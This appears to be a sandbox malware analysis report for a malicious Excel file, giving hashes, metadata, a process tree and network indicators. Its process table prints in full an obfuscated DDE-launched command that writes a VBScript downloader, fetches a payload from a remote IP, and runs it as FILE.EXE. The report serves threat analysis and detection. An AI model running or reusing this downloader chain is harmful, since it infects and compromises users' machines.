| Field | Value |
|---|---|
| File name | 0889264f3e4d08c5f794a156de02624bca3c01f0b921042e2245f168767dd48e.xls |
| Full analysis | https://app.any.run/tasks/884603c6-15bf-4b0a-8a83-104420253235 |
| Verdict | Malicious activity |
| Analysis date | April 25, 2019, 01:51:12 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.ms-excel |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1251, Last Saved By: google, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Nov 18 03:33:42 2009, Last Saved Time/Date: Wed Apr 24 04:32:14 2019, Security: 0 |
| MD5 | CB86E9667EB9C638C1CB160ADB9CA788 |
| SHA1 | 5EBAAC8906EB78730C66EB687A407AE3A9F01AFA |
| SHA256 | 0889264F3E4D08C5F794A156DE02624BCA3C01F0B921042E2245F168767DD48E |
| SSDEEP | 768:t8ow146iDUP10uOLlxILok6VeBWcu6n/dgAZjA8vp9f68rnd:Xw146iDUP10uOLlxILok6VeBWcln/dgi |
| Extension | Detected file type (score) |
|---|---|
| .xls | Microsoft Excel sheet (48) |
| .xls | Microsoft Excel sheet (alternate) (39.2) |
| Property | Value |
|---|---|
| LastModifiedBy | |
| Software | Microsoft Excel |
| CreateDate | 2009:11:18 03:33:42 |
| ModifyDate | 2019:04:24 03:32:14 |
| Security | None |
| CodePage | Windows Cyrillic |
| AppVersion | 16 |
| ScaleCrop | No |
| LinksUpToDate | No |
| SharedDoc | No |
| HyperlinksChanged | No |
| TitleOfParts | |
| HeadingPairs | |
| CompObjUserTypeLen | 26 |
| CompObjUserType | ???? Microsoft Excel 2003 |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 2580 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | explorer.exe |
| 3192 | CMd /c cd %TEMP% & @ECHO B4c= "http://185.251.38.91/foto.jpg">>K5i.VBS &@ECHO M8d = Y0k("RUXQ:QdQ")>>K5i.VBS &@ECHO Set N5g = CreateObject(Y0k("Y_dYX>:dYXT``\"))>>K5i.VBS &@ECHO N5g.Open Y0k("SQ`"), B4c, False>>K5i.VBS &@ECHO N5g.send ("")>>K5i.VBS &@ECHO Set L0p = CreateObject(Y0k("MP[PN:_`^QMY"))>>K5i.VBS &@ECHO L0p.Open>>K5i.VBS &@ECHO L0p.Type = 1 >>K5i.VBS &@eCHo L0p.Write N5g.ResponseBody>>K5i.VBS &@ECHO L0p.Position = 0 >>K5i.VBS &@ECHO L0p.SaveToFile M8d, 2 >>K5i.VBS &@ECHO L0p.Close>>K5i.VBS &@ECHO function Y0k(D0r) >> K5i.VBS &@ECHO For K5x = 1 To Len(D0r) >>K5i.VBS &@ECHO O1u = Mid(D0r, K5x, 1) >>K5i.VBS &@ECHO O1u = Chr(Asc(O1u)- 12) >>K5i.VBS &@ECHO I5b = I5b + O1u >> K5i.VBS &@ECHO Next >>K5i.VBS &@ECHO Y0k = I5b >>K5i.VBS &@ECHO End Function >>K5i.VBS & K5i.VBS &dEl K5i.VBS & tIMeOUT 13 & FILE.EXE | C:\Windows\system32\CMd.exe | — | EXCEL.EXE |
| 1512 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\K5i.VBS" | C:\Windows\System32\WScript.exe | — | CMd.exe |
| 3272 | tIMeOUT 13 | C:\Windows\system32\timeout.exe | — | CMd.exe |

| PID | User | Company | Integrity level | Description | Exit code | Version |
|---|---|---|---|---|---|---|
| 2580 | admin | Microsoft Corporation | MEDIUM | Microsoft Excel | — | 14.0.6024.1000 |
| 3192 | admin | Microsoft Corporation | MEDIUM | Windows Command Processor | 1 | 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
| 1512 | admin | Microsoft Corporation | MEDIUM | Microsoft ® Windows Based Script Host | 0 | 5.8.7600.16385 |
| 3272 | admin | Microsoft Corporation | MEDIUM | timeout - pauses command processing | 0 | 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 2580 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR63DC.tmp.cvr | — | — | — |
| 3192 | CMd.exe | C:\Users\admin\AppData\Local\Temp\K5i.VBS | text | FEE0BA8CBE7A67F4967884AEF523A4C5 | A38C58BCB673A1864F18805494FBC3AE02AC9470479FF3A1A420FD748986DC9A |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1512 | WScript.exe | GET | — | 185.251.38.91:80 | http://185.251.38.91/foto.jpg | unknown | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 185.251.38.91:80 | — | — | — | malicious |